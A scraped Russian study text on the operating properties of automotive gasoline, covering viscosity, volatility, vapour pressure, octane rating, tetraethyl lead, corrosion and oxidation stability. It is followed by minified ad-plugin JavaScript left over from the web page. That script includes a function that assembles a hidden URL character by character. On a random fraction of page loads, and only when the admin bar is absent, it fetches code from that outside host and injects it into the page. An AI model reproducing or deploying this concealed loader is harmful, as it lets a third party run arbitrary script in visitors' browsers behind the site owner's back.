  • В системе СИ за единицу динамической вязкости h принята вязкость такой жидкости, которая оказывает сопротивление 1Н взаимному сдвигу двух слоёв жидкости площадью 1 м2, находящихся на расстоянии 1 м один от другого и перемещающихся с относительной скоростью 1 м/с.
  • Единица измерения динамической вязкости [кг/(м*с)].
  • Кинематическая вязкость — это динамическая вязкость, разделённая на плотность жидкости, определённой при той же температуре.

nt = ht /rt. (2.2)

За единицу кинематической вязкости в СИ принят квадратный метр в секунду [м2/с]. Наиболее часто используется мм2/с.

Условной вязкостью называется вязкость, выраженная в условных единицах, получаемых на различных вискозиметрах. Пересчёт условной вязкости (0ВУt) (градусов Энглера 0Еt) в кинематическую производится по следующей формуле:

nt = 0,07319 0ВУt — 0,631 / 0ВУt. (2.3)

Вязкость оказывает превалирующее влияние на весовое количество топлива, протекающее через жиклёр в единицу времени. Снижение температуры вызывает увеличение вязкости бензина, а это вызывает снижение его расхода. Расход бензина через жиклёр при изменении температуры от 40 до — 40 0С снижается на 20 — 30 %.

  • — Поверхностное натяжение — характеризуется работой, необходимой для образования 1 м2 поверхности жидкости (т.е. для перемещения молекул жидкости из её объёма в поверхностный слой площадью в 1 м2) и выражается в Н/м. Поверхностное натяжение, наряду с вязкостью, влияет на степень распыливания бензина. Чем меньше его величина, тем меньших размеров получаются капли. Поверхностное натяжение всех автомобильных бензинов одинаково и при +20 0С равно 20 — 24 мН/м (в 3,5 раза меньше чем у воды).
  • — Испаряемость. Под испаряемостью топлива понимают его способность переходить из жидкого состояния в парообразное.

Испарение топлива является необходимым условием его сгорания, так как смешивается с воздухом и воспламеняется только паровая фаза. Автомобильные бензины должны обладать такой испаряемостью, чтобы обеспечивать лёгкий пуск двигателя, его быстрый прогрев и полное сгорание бензина после этого, а также исключить образование паровых пробок в топливной системе.

Практически испаряемость топлив для двигателей оценивают, определяя их фракционный состав методом разгонки на стандартном аппарате (для бензинов измеряют ещё и давление насыщенных паров). Бензин, представляя собой смесь углеводородов, не имеет фиксированной температуры кипения: он испаряется в интервале температуры 35 — 195 0С.

При разгонке фиксируют следующие характерные температурные точки: температура начала кипения, температуры выкипания 10 % (t10), 50 % (t50), 90 % (t90) топлива и температуру конца кипения. Характерные температурные точки приводят в стандартах и паспортах качества.

Содержание лёгких фракций в топливе характеризуется температурой выкипания 10 %. Эти фракции определяют пусковые свойства топлива, чем ниже температура выкипания 10 % топлива, тем они лучше. Для зимнего топлива t10 должна быть не выше 55 0С. Но при использовании зимнего вида бензина в летний период возможно образование паровых пробок в топливоподающей системе.

Качества горючей смеси при разных режимах работы двигателя, продолжительность прогрева, приёмистость зависят от испаряемости рабочей фракции, которая по стандарту нормируется 50 % — ной точкой. Чем ниже температура этой точки, тем однороднее состав рабочей смеси по отдельным цилиндрам, тем устойчивее работает двигатель, улучшается его приёмистость.

Температура выкипания 90 % топлива характеризует его склонность к конденсации. Склонность топлива к конденсации тем меньше, чем меньше интервал от t90 до температуры конца кипения, когда испаряются тяжёлые углеводороды.

Поскольку тяжёлые углеводороды испаряются не полностью, то, оставаясь в капельно-жидком состоянии, они могут проникать через зазоры между цилиндром и поршневыми кольцами в картер двигателя, что приводит к смыванию смазочной плёнки, увеличению износа деталей, разжижению масла, увеличению расхода топлива.

— Давление насыщенных паров. Давление паров испаряющегося бензина на стенки герметичной ёмкости называют давлением (упругостью) насыщенных паров. Давление насыщенных паров возрастает при повышении температуры.

Стандартом ограничивается верхний предел давления паров до 67 кПа летом и от 67 до 93 кПа зимой. Бензины с высокой упругостью паров склонны к повышенному образованию паровых пробок в топливоподающей системе; их использование влечёт за собой снижение наполнения цилиндров, падение мощности. Увеличиваются также потери от испарения такого бензина при хранении на складах и в топливных баках.

— Низкотемпературные свойства. Температура застывания автомобильных бензинов обычно ниже минус 60 0С, поэтому этот показатель для них не регламентируется. Но при эксплуатации двигателя в условиях низких температур могут возникнуть осложнения связанные с образованием в бензинах кристаллов льда.

Установлено, что с понижением температуры растворимость воды в бензинах уменьшается. При быстром охлаждении излишняя влага, не успевшая перейти в воздух, выделяется в виде мелких капель, которые при отрицательных температурах превращаются в кристаллы льда.

Забивая фильтры, кристаллы нарушают подачу бензина в двигатель.

  1. Антидетонационные свойства:
  2. — Детонационная стойкость, оцениваемая октановым числом (ОЧ), — важнейшее свойство топлива, обеспечивающее работу двигателя без детонации.
  3. Октановым числом топлива называют процентное содержание (по объёму) изооктана в искусственно приготовленной смеси, состоящей из изооктана (ОЧ = 100) и нормального гептана (ОЧ = 0), по своей детонационной стойкости равноценной испытуемому топливу.

Определяют ОЧ моторным и исследовательским методами. Моторным методом ОЧ определяют на одноцилиндровой установке ИТ 9 — 2М, позволяющей проводить испытания с переменной степенью сжатия от 4 до 10 единиц.

Исследовательским методом детонационную стойкость бензина определяют на установке ИТ9 — 6 в режиме работы легкового автомобиля при его движении в условиях города.

Разница в ОЧ, определённых по исследовательскому и моторному методам, составляет 7 — 10 единиц (при исследовательском методе ОЧ больше).

ОЧ указывают на всех марках бензина. При его определении исследовательским методом в маркировке ставится буква «И», например АИ — 93.

Детонационная стойкость бензина зависит от его группового состава и от того на какой смеси работает двигатель. В топлива, антидетонационные свойства которых не соответствуют эксплуатационным требованиям, добавляют высокооктановые компоненты или специальные присадки — антидетонаторы.

  • В качестве высокооктановых компонентов применяют вещества, обладающие хорошими антидетонационными свойствами: бензол, этиловый спирт, продукты каталитического крекинга, риформинга.
  • Наиболее распространённой присадкой — антидетонатором, в настоящее время, является тетраэтилсвинец Pb(C2H5)4(ТЭС).
  • Установлено, что ТЭС действует, как антидетонатор только при высоких температурах, когда он начинает распадаться с образованием атомного свинца. Механизм действия ТЭС, как антидетонатора описывается следующими выражениями:
  • Pb(C2H5)4 ® Pb + 4C2H5, (2.4)

Pb + O2 ® PbO2. (2.5)

Двуокись свинца вступает в реакцию с перекисями, разрушая их и образуя малоактивные продукты окисления углеводородов и окись свинца.

R — CH2 — OOH + PbO2 ® COH + PbO + H2O + Ѕ O2. (2.6)

Окись свинца, взаимодействуя с кислородом воздуха, снова окисляется в двуокись свинца, которая вновь способна реагировать с перекисной молекулой. Этим объясняется высокая эффективность малых количеств антидетонатора.

Наиболее существенным недостатком ТЭС является его высокая токсичность.

В чистом виде ТЭС не применяют, так как это может привести к отложению окислов свинца в камере сгорания. В бензин вводят этиловую жидкость, представляющую собой смесь ТЭС с выносителями и красителями. Бензин с этиловой жидкостью называют этилированным. Искусственное окрашивание такого бензина предупреждает о его ядовитости (А — 76 жёлтый; АИ — 93 оранжевый, АИ — 98 голубой).

  1. Токсичность ТЭС, несмотря на его хорошие антидетанационные свойства, обуславливает необходимость разработки новых не токсичных, или менее токсичных антидетонаторов.
  2. Коррозионные свойства:
  3. Топливо вызывает коррозию металлов и в жидком и в газообразном состоянии, коррозионное воздействие оказывают и продукты его сгорания.
  4. От углеводородов топлива металлы не корродируют, коррозии способствует наличие в топливе коррозионно-агрессивных соединений: водорастворимых (минеральных) кислот и щелочей, активных сернистых соединений, воды, органических кислот.
  5. Вода, а также водорастворимые кислоты и щёлочи в товарных бензинах отсутствуют, могут попасть при транспортировке и хранении.

Органические кислоты всегда содержатся в топливе (менее активны по сравнению с неорганическими), но их содержание заметно возрастает при длительном хранении. Содержание органических кислот характеризуют кислотностью. Этот показатель нормируют количеством щелочи (в миллиграммах), потребной для нейтрализации кислот, содержащихся в 100 мл топлива.

Сернистые соединения по коррозионной агрессивности подразделяют на активные и неактивные. Их содержание в топливе отрицательно сказывается на таких его свойствах, как стабильность, способность к нагарообразованию, коррозионная агрессивность и др.

Сернистые соединения способствуют повышению коррозионной агрессивности продуктов сгорания, приводят к повышению твёрдости нагара. Присутствие данных соединений в топливе крайне нежелательно.

Максимальное содержание серы в отечественных бензинах регламентируется соответствующими стандартами и составляет 0,12%.

Стабильность топлива

Под стабильностью топлива понимают его способность сохранять свойства в допустимых пределах для конкретных эксплуатационных условий. Условно различают физическую и химическую стабильность топлива. Физическая стабильность — способность топлива сохранять свой фракционный состав и однородность.

Химическая стабильность — способность топлива сохранять свой химический состав. В результате окисления бензинов в процессе хранения образуются растворимые органические кислоты и смолистые вещества. Содержанием фактических смол — продуктов реакций окисления, полимеризации и конденсации определяют степень осмоления бензинов.

При содержании фактических смол в пределах, допускаемых стандартами (7 — 15 мг/100мл), двигатели длительное время работают без повышенного смоло- и нагарообразования. Способность бензина сохранять свой состав неизменным при соблюдении условий перевозки, хранения и использования (стабильность) оценивают индукционным периодом.

Этот показатель оценивают по времени в минутах от начала окисления бензина до активного поглощения им кислорода в лабораторной установке при искусственном окислении бензина (t = 100 0C, в атмосфере сухого чистого кислорода при давлении 0,7 МПа). Это время для бензинов находится в пределах от 600 до 900 мин.

Для повышения химической стабильности применяют гидроочистку бензинов и вводят в их состав специальные многофункциональные антиокислительные присадки.

Источник: https://studwood.ru/1671313/tehnika/opisanie_ekspluatatsionnyh_svoystv_primenyaemyh_topliv_smazochnyh_materialov_spetsialnyh_zhidkostey_avtomobilya

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};